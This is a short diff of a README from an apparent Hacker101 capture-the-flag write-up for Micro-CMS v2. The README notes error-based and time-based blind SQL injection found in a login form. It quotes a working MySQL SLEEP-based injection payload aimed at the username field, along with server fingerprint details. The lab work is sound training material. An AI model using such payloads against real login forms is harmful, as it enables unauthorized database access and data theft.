psalire/Hacker-101-CTFs/Micro-CMS_v2/README.md

 >    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 >    Payload: username=yZPi' AND (SELECT 6535 FROM (SELECT(SLEEP(5)))ExUj) AND 'cIlM'='cIlM&password=

 Two exploits found: One exploit leverages the error message, the other leverages a blind time-based query to deduce data.
-Use this to dump to DBs:
+Use these to dump to DBs:

 >web server operating system: Linux Ubuntu
 >web application technology: Nginx 1.14.0